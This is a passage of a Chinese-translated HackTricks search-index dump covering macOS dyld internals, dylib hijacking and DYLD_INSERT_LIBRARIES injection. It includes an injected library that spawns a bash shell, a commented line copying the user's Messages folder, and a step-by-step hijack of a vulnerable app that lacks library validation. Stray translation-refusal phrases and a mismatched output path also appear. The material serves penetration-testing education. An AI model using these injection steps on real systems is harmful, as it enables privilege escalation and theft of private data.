- 当路径 **包含斜杠但不是框架路径**(即到 dylib 的完整路径或部分路径)时,dlopen() 首先在(如果设置) **`$DYLD_LIBRARY_PATH`** 中查找(使用路径的叶部分)。接下来,dyld **尝试提供的路径**(对相对路径使用当前工作目录(但仅适用于不受限制的进程))。最后,对于旧二进制文件,dyld 将尝试后备方案。如果 **`$DYLD_FALLBACK_LIBRARY_PATH`** 在启动时设置,dyld 将在这些目录中搜索,否则,dyld 将在 **`/usr/local/lib/`** 中查找(如果进程不受限制),然后在 **`/usr/lib/`** 中查找。\\n1. `$DYLD_LIBRARY_PATH`\\n2. 提供的路径(如果不受限制,则对相对路径使用当前工作目录)\\n3. `$DYLD_FALLBACK_LIBRARY_PATH`\\n4. `/usr/local/lib/`(如果不受限制)\\n5. `/usr/lib/`
\\n

caution\\n

如果名称中有斜杠且不是框架,则劫持的方式将是: - 如果二进制文件是 **不受限制的**,那么可以从 CWD 或 `/usr/local/lib` 加载某些内容(或滥用上述提到的环境变量之一)
\\n

tip\\n

注意:没有配置文件来 **控制 dlopen 搜索**。 注意:如果主可执行文件是 **set\\\\[ug]id 二进制文件或具有权限的代码签名**,则 **所有环境变量都将被忽略**,只能使用完整路径([检查 DYLD_INSERT_LIBRARIES 限制](macos-dyld-hijacking-and-dyld_insert_libraries.md#check-dyld_insert_librery-restrictions)以获取更详细的信息)。 注意:Apple 平台使用“通用”文件来组合 32 位和 64 位库。这意味着没有 **单独的 32 位和 64 位搜索路径**。 注意:在 Apple 平台上,大多数操作系统 dylibs 被 **组合到 dyld 缓存中**,并且在磁盘上不存在。因此,调用 **`stat()`** 以预检操作系统 dylib 是否存在 **将不起作用**。然而,**`dlopen_preflight()`** 使用与 **`dlopen()`** 相同的步骤来查找兼容的 mach-o 文件。
**检查路径** 让我们使用以下代码检查所有选项: // gcc dlopentest.c -o dlopentest -Wl,-rpath,/tmp/test #include #include int main(void) { void* handle; fprintf(\\"--- No slash ---\\\\n\\"); handle = dlopen(\\"just_name_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Relative framework ---\\\\n\\"); handle = dlopen(\\"a/framework/rel_framework_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Abs framework ---\\\\n\\"); handle = dlopen(\\"/a/abs/framework/abs_framework_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Relative Path ---\\\\n\\"); handle = dlopen(\\"a/folder/rel_folder_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } fprintf(\\"--- Abs Path ---\\\\n\\"); handle = dlopen(\\"/a/abs/folder/abs_folder_dlopentest.dylib\\",1); if (!handle) { fprintf(stderr, \\"Error loading: %s\\\\n\\\\n\\\\n\\", dlerror()); } return 0; } 如果你编译并执行它,你可以看到**每个库被搜索但未成功找到的位置**。此外,你还可以**过滤文件系统日志**: sudo fs_usage | grep \\"dlopentest\\" ## 相对路径劫持 如果一个 **特权二进制文件/应用程序**(如 SUID 或某些具有强大权限的二进制文件)正在 **加载相对路径** 库(例如使用 `@executable_path` 或 `@loader_path`)并且 **禁用库验证**,攻击者可能会将二进制文件移动到一个位置,在那里攻击者可以 **修改相对路径加载的库**,并利用它在进程中注入代码。 ## 修剪 `DYLD_*` 和 `LD_LIBRARY_PATH` 环境变量 在文件 `dyld-dyld-832.7.1/src/dyld2.cpp` 中,可以找到函数 **`pruneEnvironmentVariables`**,该函数将删除任何 **以 `DYLD_`** 和 **`LD_LIBRARY_PATH=`** 开头的环境变量。 它还将特定地将环境变量 **`DYLD_FALLBACK_FRAMEWORK_PATH`** 和 **`DYLD_FALLBACK_LIBRARY_PATH`** 设置为 **null**,适用于 **suid** 和 **sgid** 二进制文件。 如果目标是 OSX,该函数会从同一文件的 **`_main`** 函数中调用,如下所示: #if TARGET_OS_OSX if ( !gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache ) { pruneEnvironmentVariables(envp, &apple); 这些布尔标志在代码中的同一文件中设置: #if TARGET_OS_OSX // support chrooting from old kernel bool isRestricted = 
false; bool libraryValidation = false; // any processes with setuid or setgid bit set or with __RESTRICT segment is restricted if ( issetugid() || hasRestrictedSegment(mainExecutableMH) ) { isRestricted = true; } bool usingSIP = (csr_check(CSR_ALLOW_TASK_FOR_PID) != 0); uint32_t flags; if ( csops(0, CS_OPS_STATUS, &flags, sizeof(flags)) != -1 ) { // On OS X CS_RESTRICT means the program was signed with entitlements if ( ((flags & CS_RESTRICT) == CS_RESTRICT) && usingSIP ) { isRestricted = true; } // Library Validation loosens searching but requires everything to be code signed if ( flags & CS_REQUIRE_LV ) { isRestricted = false; libraryValidation = true; } } gLinkContext.allowAtPaths = !isRestricted; gLinkContext.allowEnvVarsPrint = !isRestricted; gLinkContext.allowEnvVarsPath = !isRestricted; gLinkContext.allowEnvVarsSharedCache = !libraryValidation || !usingSIP; gLinkContext.allowClassicFallbackPaths = !isRestricted; gLinkContext.allowInsertFailures = false; gLinkContext.allowInterposing = true; 这基本上意味着,如果二进制文件是 **suid** 或 **sgid**,或者在头文件中有 **RESTRICT** 段,或者它是用 **CS_RESTRICT** 标志签名的,那么 **`!gLinkContext.allowEnvVarsPrint && !gLinkContext.allowEnvVarsPath && !gLinkContext.allowEnvVarsSharedCache`** 为真,环境变量将被修剪。 请注意,如果 CS_REQUIRE_LV 为真,则变量不会被修剪,但库验证将检查它们是否使用与原始二进制文件相同的证书。 ## 检查限制 ### SUID & SGID","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Dylib 劫持","id":"2497","title":"Dylib 劫持"},"2498":{"body":"sudo chown root hello sudo chmod +s hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Make it owned by root and suid","id":"2498","title":"Make it owned by root and suid"},"2499":{"body":"DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Insert the library","id":"2499","title":"Insert the library"},"25":{"body":"Hacktricks logos designed by @ppiernacho 
.","breadcrumbs":"Pentesting Methodology » Pentesting Methodology","id":"25","title":"Pentesting Methodology"},"250":{"body":"Palo Alto Unit42 – Infiltration of Global Telecom Networks 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) 3GPP TS 29.281 – GTPv2-C (v17.6.0) Demystifying 5G Security: Understanding the Registration Protocol 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS 3GPP TS 33.501 – Security architecture and procedures for 5G System tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » References","id":"250","title":"References"},"2500":{"body":"sudo chmod -s hello ### Section `__RESTRICT` with segment `__restrict` gcc -sectcreate __RESTRICT __restrict /dev/null hello.c -o hello-restrict DYLD_INSERT_LIBRARIES=inject.dylib ./hello-restrict ### Hardened runtime 在钥匙串中创建一个新证书,并使用它来签署二进制文件:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Remove suid","id":"2500","title":"Remove suid"},"2501":{"body":"codesign -s --option=runtime ./hello DYLD_INSERT_LIBRARIES=inject.dylib ./hello #Library won\'t be injected","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Apply runtime proetction","id":"2501","title":"Apply runtime proetction"},"2502":{"body":"codesign -f -s --option=library ./hello DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed #Will throw an error because signature of binary and library aren\'t signed by same cert (signs must be from a valid Apple-signed developer certificate)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library 
Injection » Apply library validation","id":"2502","title":"Apply library validation"},"2503":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Sign it","id":"2503","title":"Sign it"},"2504":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » If the signature is from an unverified developer the injection will still work","id":"2504","title":"If the signature is from an unverified developer the injection will still work"},"2505":{"body":"codesign -f -s inject.dylib DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » If it\'s from a verified developer, it won\'t","id":"2505","title":"If it\'s from a verified developer, it won\'t"},"2506":{"body":"codesign -f -s --option=restrict hello-signed DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won\'t work","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » Apply CS_RESTRICT protection","id":"2506","title":"Apply CS_RESTRICT protection"},"2507":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES","id":"2507","title":"macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES"},"2508":{"body":"要注入的库 以执行 shell: c // gcc -dynamiclib -o inject.dylib inject.c #include \\n#include \\n#include \\n#include \\n__attribute__((constructor)) void myconstructor(int argc, const char **argv)\\n{\\nsyslog(LOG_ERR, \\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nprintf(\\"[+] dylib injected in %s\\\\n\\", argv[0]);\\nexecv(\\"/bin/bash\\", 0);\\n//system(\\"cp -r ~/Library/Messages/ /tmp/Messages/\\");\\n} 二进制攻击目标: c // gcc hello.c -o hello\\n#include int main()\\n{\\nprintf(\\"Hello, World!\\\\n\\");\\nreturn 0;\\n} 注入: bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » DYLD_INSERT_LIBRARIES 基本示例","id":"2508","title":"DYLD_INSERT_LIBRARIES 基本示例"},"2509":{"body":"目标易受攻击的二进制文件是 /Applications/VulnDyld.app/Contents/Resources/lib/binary。 entitlements\\nLC_RPATH\\n@rpath codesign -dv --entitlements :- \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n[...]com.apple.security.cs.disable-library-validation[...] bash # Check where are the @rpath locations\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep LC_RPATH -A 2\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/. 
(offset 12)\\n--\\ncmd LC_RPATH\\ncmdsize 32\\npath @loader_path/../lib2 (offset 12) bash # Check librareis loaded using @rapth and the used versions\\notool -l \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\" | grep \\"@rpath\\" -A 3\\nname @rpath/lib.dylib (offset 24)\\ntime stamp 2 Thu Jan 1 01:00:02 1970\\ncurrent version 1.0.0\\ncompatibility version 1.0.0\\n# Check the versions 根据之前的信息,我们知道它 没有检查加载库的签名 ,并且 尝试从以下位置加载库 : /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib 然而,第一个库并不存在: bash pwd\\n/Applications/VulnDyld.app find ./ -name lib.dylib\\n./Contents/Resources/lib2/lib.dylib 所以,可以劫持它!创建一个库, 执行一些任意代码并通过重新导出相同的功能 来导出与合法库相同的功能。并记得使用预期的版本进行编译: lib.m #import __attribute__((constructor))\\nvoid custom(int argc, const char **argv) {\\nNSLog(@\\"[+] dylib hijacked in %s\\", argv[0]);\\n} 抱歉,我无法满足该请求。 bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,\\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" -o \\"/tmp/lib.dylib\\"\\n# Note the versions and the reexport 在库中创建的重新导出路径是相对于加载器的,让我们将其更改为库的绝对路径以进行导出: bash #Check relative\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 48\\nname @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path\\ninstall_name_tool -change @rpath/lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib\\" /tmp/lib.dylib # Check again\\notool -l /tmp/lib.dylib| grep REEXPORT -A 2\\ncmd LC_REEXPORT_DYLIB\\ncmdsize 128\\nname /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) 最后将其复制到 hijacked location : bash cp lib.dylib \\"/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib\\" 并 执行 二进制文件并检查 库是否已加载 : \\"/Applications/VulnDyld.app/Contents/Resources/lib/binary\\"\\n2023-05-15 15:20:36.677 binary[78809:21797902] [+] 
dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary\\nUsage: [...] note 关于如何利用此漏洞滥用 Telegram 的相机权限的详细说明可以在 https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/ 中找到。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » Dyld 劫持示例","id":"2509","title":"Dyld 劫持示例"},"251":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 此问题在以下博客文章中发现: https://www.rtcsec.com/article/novel-dos-vulnerability-affecting-webrtc-media-servers/ 在WebRTC媒体服务器中描述的漏洞源于媒体会话初始化期间的 竞争条件 ,具体是在 ICE媒体同意验证 和 DTLS流量初始化 之间。以下是详细的分解:","breadcrumbs":"Pentesting Network » WebRTC DoS » WebRTC DoS","id":"251","title":"WebRTC DoS"},"2510":{"body":"如果您计划尝试在意外的二进制文件中注入库,您可以检查事件消息以找出库何时在进程中加载(在这种情况下,删除 printf 和 /bin/bash 执行)。 bash sudo log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"[+] dylib\\"\' tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES » 更大规模","id":"2510","title":"更大规模"},"2511":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » macOS Dyld 进程","id":"2511","title":"macOS Dyld 进程"},"2512":{"body":"Mach-o 二进制文件的真正 入口点 是动态链接的,定义在 LC_LOAD_DYLINKER 中,通常是 /usr/lib/dyld。 这个链接器需要定位所有可执行库,将它们映射到内存中,并链接所有非惰性库。只有在这个过程完成后,二进制文件的入口点才会被执行。 当然, dyld 没有任何依赖(它使用系统调用和 libSystem 摘录)。 caution 如果这个链接器包含任何漏洞,因为它在执行任何二进制文件(即使是高度特权的)之前被执行,那么就有可能 提升权限 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 基本信息","id":"2512","title":"基本信息"},"2513":{"body":"Dyld 将由 dyldboostrap::start 加载,这也会加载诸如 栈金丝雀 之类的内容。这是因为这个函数将在其 apple 参数向量中接收这些和其他 敏感 值 。 dyls::_main() 是 dyld 的入口点,它的第一个任务是运行 configureProcessRestrictions(),通常会限制 DYLD_* 环境变量,具体解释如下: macOS Library Injection 然后,它映射 dyld 共享缓存,该缓存预链接所有重要的系统库,然后映射二进制文件所依赖的库,并递归继续,直到所有所需的库都被加载。因此: 它开始加载插入的库,使用 DYLD_INSERT_LIBRARIES(如果允许) 然后是共享缓存的库 然后是导入的库 然后继续递归导入库 一旦所有库都加载完成,这些库的 初始化器 将被运行。这些是使用 __attribute__((constructor)) 编写的,定义在 LC_ROUTINES[_64](现已弃用)中,或通过指针在标记为 S_MOD_INIT_FUNC_POINTERS 的部分中(通常是: __DATA.__MOD_INIT_FUNC )。 终结器使用 __attribute__((destructor)) 编写,并位于标记为 S_MOD_TERM_FUNC_POINTERS 的部分中( __DATA.__mod_term_func )。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 
流程","id":"2513","title":"流程"},"2514":{"body":"macOS 中的所有二进制文件都是动态链接的。因此,它们包含一些存根部分,帮助二进制文件在不同机器和上下文中跳转到正确的代码。当二进制文件被执行时,dyld 是需要解析这些地址的“大脑”(至少是非惰性地址)。 二进制文件中的一些存根部分: __TEXT.__[auth_]stubs :来自 __DATA 部分的指针 __TEXT.__stub_helper :调用动态链接的小代码,包含要调用的函数的信息 __DATA.__[auth_]got :全局偏移表(导入函数的地址,当解析时,(在加载时绑定,因为它标记为 S_NON_LAZY_SYMBOL_POINTERS)) __DATA.__nl_symbol_ptr :非惰性符号指针(在加载时绑定,因为它标记为 S_NON_LAZY_SYMBOL_POINTERS) __DATA.__la_symbol_ptr :惰性符号指针(在首次访问时绑定) warning 请注意,前缀为 \\"auth_\\" 的指针使用一个进程内加密密钥进行保护(PAC)。此外,可以使用 arm64 指令 BLRA[A/B] 在跟随指针之前验证它。而 RETA[A/B] 可以用作 RET 地址。 实际上, __TEXT.__auth_stubs 中的代码将使用 braa 而不是 bl 来调用请求的函数以验证指针。 还要注意,当前的 dyld 版本将 所有内容都加载为非惰性 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 存根","id":"2514","title":"存根"},"2515":{"body":"c //gcc load.c -o load\\n#include \\nint main (int argc, char **argv, char **envp, char **apple)\\n{\\nprintf(\\"Hi\\\\n\\");\\n} 有趣的反汇编部分: armasm ; objdump -d ./load\\n100003f7c: 90000000 adrp\\tx0, 0x100003000 <_main+0x1c>\\n100003f80: 913e9000 add\\tx0, x0, #4004\\n100003f84: 94000005 bl\\t0x100003f98 <_printf+0x100003f98> 可以看到跳转到调用 printf 的位置是 __TEXT.__stubs : bash objdump --section-headers ./load ./load:\\tfile format mach-o arm64 Sections:\\nIdx Name Size VMA Type\\n0 __text 00000038 0000000100003f60 TEXT\\n1 __stubs 0000000c 0000000100003f98 TEXT\\n2 __cstring 00000004 0000000100003fa4 DATA\\n3 __unwind_info 00000058 0000000100003fa8 DATA\\n4 __got 00000008 0000000100004000 DATA 在**__stubs**部分的反汇编中: bash objdump -d --section=__stubs ./load ./load:\\tfile format mach-o arm64 Disassembly of section __TEXT,__stubs: 0000000100003f98 <__stubs>:\\n100003f98: b0000010 adrp\\tx16, 0x100004000 <__stubs+0x4>\\n100003f9c: f9400210 ldr\\tx16, [x16]\\n100003fa0: d61f0200 br\\tx16 你可以看到我们正在 跳转到GOT的地址 ,在这种情况下,它是非懒惰解析的,并将包含printf函数的地址。 在其他情况下,可能不是直接跳转到GOT,而是跳转到**__DATA.__la_symbol_ptr ,这将加载一个表示它试图加载的函数的值,然后跳转到 __TEXT.__stub_helper ,该函数跳转到 __DATA.__nl_symbol_ptr 
,其中包含 dyld_stub_binder 的地址,该函数将函数编号和地址作为参数。 这个最后的函数在找到所搜索函数的地址后,将其写入 __TEXT.__stub_helper**中的相应位置,以避免将来进行查找。 tip 但是请注意,当前的dyld版本将所有内容加载为非懒惰。 Dyld操作码 最后,**dyld_stub_binder**需要找到指定的函数并将其写入正确的地址,以便不再搜索它。为此,它在dyld中使用操作码(有限状态机)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » 查找惰性符号","id":"2515","title":"查找惰性符号"},"2516":{"body":"在macOS中,主函数实际上接收4个参数而不是3个。第四个被称为apple,每个条目都是key=value的形式。例如: c // gcc apple.c -o apple\\n#include \\nint main (int argc, char **argv, char **envp, char **apple)\\n{\\nfor (int i=0; apple[i]; i++)\\nprintf(\\"%d: %s\\\\n\\", i, apple[i])\\n} 请提供需要翻译的具体内容。 0: executable_path=./a\\n1:\\n2:\\n3:\\n4: ptr_munge=\\n5: main_stack=\\n6: executable_file=0x1a01000012,0x5105b6a\\n7: dyld_file=0x1a01000012,0xfffffff0009834a\\n8: executable_cdhash=757a1b08ab1a79c50a66610f3adbca86dfd3199b\\n9: executable_boothash=f32448504e788a2c5935e372d22b7b18372aa5aa\\n10: arm64e_abi=os\\n11: th_port= tip 到这些值到达主函数时,敏感信息已经从中删除,否则就会发生数据泄露。 可以在进入主函数之前通过调试查看所有这些有趣的值: lldb ./apple (lldb) target create \\"./a\\"\\n当前可执行文件设置为 \'/tmp/a\' (arm64)。\\n(lldb) process launch -s\\n[..] (lldb) mem read $sp\\n0x16fdff510: 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 ................\\n0x16fdff520: d8 f6 df 6f 01 00 00 00 00 00 00 00 00 00 00 00 ...o............ 
(lldb) x/55s 0x016fdff6d8\\n[...]\\n0x16fdffd6a: \\"TERM_PROGRAM=WarpTerminal\\"\\n0x16fdffd84: \\"WARP_USE_SSH_WRAPPER=1\\"\\n0x16fdffd9b: \\"WARP_IS_LOCAL_SHELL_SESSION=1\\"\\n0x16fdffdb9: \\"SDKROOT=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX14.4.sdk\\"\\n0x16fdffe24: \\"NVM_DIR=/Users/carlospolop/.nvm\\"\\n0x16fdffe44: \\"CONDA_CHANGEPS1=false\\"\\n0x16fdffe5a: \\"\\"\\n0x16fdffe5b: \\"\\"\\n0x16fdffe5c: \\"\\"\\n0x16fdffe5d: \\"\\"\\n0x16fdffe5e: \\"\\"\\n0x16fdffe5f: \\"\\"\\n0x16fdffe60: \\"pfz=0xffeaf0000\\"\\n0x16fdffe70: \\"stack_guard=0x8af2b510e6b800b5\\"\\n0x16fdffe8f: \\"malloc_entropy=0xf2349fbdea53f1e4,0x3fd85d7dcf817101\\"\\n0x16fdffec4: \\"ptr_munge=0x983e2eebd2f3e746\\"\\n0x16fdffee1: \\"main_stack=0x16fe00000,0x7fc000,0x16be00000,0x4000000\\"\\n0x16fdfff17: \\"executable_file=0x1a01000012,0x5105b6a\\"\\n0x16fdfff3e: \\"dyld_file=0x1a01000012,0xfffffff0009834a\\"\\n0x16fdfff67: \\"executable_cdhash=757a1b08ab1a79c50a66610f3adbca86dfd3199b\\"\\n0x16fdfffa2: \\"executable_boothash=f32448504e788a2c5935e372d22b7b18372aa5aa\\"\\n0x16fdfffdf: \\"arm64e_abi=os\\"\\n0x16fdfffed: \\"th_port=0x103\\"\\n0x16fdffffb: \\"\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » apple[] 参数向量","id":"2516","title":"apple[] 参数向量"},"2517":{"body":"这是由 dyld 导出的一个结构,包含有关 dyld 状态的信息,可以在 源代码 中找到,包含版本、指向 dyld_image_info 数组的指针、指向 dyld_image_notifier 的指针、如果进程与共享缓存分离、如果调用了 libSystem 初始化程序、指向 dyls 自身 Mach 头的指针、指向 dyld 版本字符串的指针等信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » dyld_all_image_infos","id":"2517","title":"dyld_all_image_infos"},"2518":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Library Injection » macOS Dyld Process » dyld 环境变量","id":"2518","title":"dyld 环境变量"},"2519":{"body":"有趣的环境变量有助于理解 dyld 在做什么: 
DYLD_PRINT_LIBRARIES 检查每个加载的库: DYLD_PRINT_LIBRARIES=1 ./apple\\ndyld[19948]: <9F848759-9AB8-3BD2-96A1-C069DC1FFD43> /private/tmp/a\\ndyld[19948]: /usr/lib/libSystem.B.dylib\\ndyld[19948]: /usr/lib/system/libcache.dylib\\ndyld[19948]: /usr/lib/system/libcommonCrypto.dylib\\ndyld[19948]: /usr/lib/system/libcompiler_rt.dylib\\ndyld[19948]: <65612C42-C5E4-3821-B71D-DDE620FB014C> /usr/lib/system/libcopyfile.dylib\\ndyld[19948]: /usr/lib/system/libcorecrypto.dylib\\ndyld[19948]: <8790BA20-19EC-3A36-8975-E34382D9747C> /usr/lib/system/libdispatch.dylib\\ndyld[19948]: <4BB77515-DBA8-3EDF-9AF7-3C9EAE959EA6> /usr/lib/system/libdyld.dylib\\ndyld[19948]: /usr/lib/system/libkeymgr.dylib\\ndyld[19948]: <1A7038EC-EE49-35AE-8A3C-C311083795FB> /usr/lib/system/libmacho.dylib\\n[...] DYLD_PRINT_SEGMENTS 检查每个库是如何加载的: DYLD_PRINT_SEGMENTS=1 ./apple\\ndyld[21147]: re-using existing shared cache (/System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e):\\ndyld[21147]: 0x181944000->0x1D5D4BFFF init=5, max=5 __TEXT\\ndyld[21147]: 0x1D5D4C000->0x1D5EC3FFF init=1, max=3 __DATA_CONST\\ndyld[21147]: 0x1D7EC4000->0x1D8E23FFF init=3, max=3 __DATA\\ndyld[21147]: 0x1D8E24000->0x1DCEBFFFF init=3, max=3 __AUTH\\ndyld[21147]: 0x1DCEC0000->0x1E22BFFFF init=1, max=3 __AUTH_CONST\\ndyld[21147]: 0x1E42C0000->0x1E5457FFF init=1, max=1 __LINKEDIT\\ndyld[21147]: 0x1E5458000->0x22D173FFF init=5, max=5 __TEXT\\ndyld[21147]: 0x22D174000->0x22D9E3FFF init=1, max=3 __DATA_CONST\\ndyld[21147]: 0x22F9E4000->0x230F87FFF init=3, max=3 __DATA\\ndyld[21147]: 0x230F88000->0x234EC3FFF init=3, max=3 __AUTH\\ndyld[21147]: 0x234EC4000->0x237573FFF init=1, max=3 __AUTH_CONST\\ndyld[21147]: 0x239574000->0x270BE3FFF init=1, max=1 __LINKEDIT\\ndyld[21147]: Kernel mapped /private/tmp/a\\ndyld[21147]: __PAGEZERO (...) 0x000000904000->0x000101208000\\ndyld[21147]: __TEXT (r.x) 0x000100904000->0x000100908000\\ndyld[21147]: __DATA_CONST (rw.) 0x000100908000->0x00010090C000\\ndyld[21147]: __LINKEDIT (r..) 
0x00010090C000->0x000100910000\\ndyld[21147]: Using mapping in dyld cache for /usr/lib/libSystem.B.dylib\\ndyld[21147]: __TEXT (r.x) 0x00018E59D000->0x00018E59F000\\ndyld[21147]: __DATA_CONST (rw.) 0x0001D5DFDB98->0x0001D5DFDBA8\\ndyld[21147]: __AUTH_CONST (rw.) 0x0001DDE015A8->0x0001DDE01878\\ndyld[21147]: __AUTH (rw.) 0x0001D9688650->0x0001D9688658\\ndyld[21147]: __DATA (rw.) 0x0001D808AD60->0x0001D808AD68\\ndyld[21147]: __LINKEDIT (r..) 0x000239574000->0x000270BE4000\\ndyld[21147]: Using mapping in dyld cache for /usr/lib/system/libcache.dylib\\ndyld[21147]: __TEXT (r.x) 0x00018E597000->0x00018E59D000\\ndyld[21147]: __DATA_CONST (rw.) 0x0001D5DFDAF0->0x0001D5DFDB98\\ndyld[21147]: __AUTH_CONST (rw.) 0x0001DDE014D0->0x0001DDE015A8\\ndyld[21147]: __LINKEDIT (r..) 0x000239574000->0x000270BE4000\\n[...] DYLD_PRINT_INITIALIZERS 当每个库初始化器运行时打印: DYLD_PRINT_INITIALIZERS=1 ./apple\\ndyld[21623]: running initializer 0x18e59e5c0 in 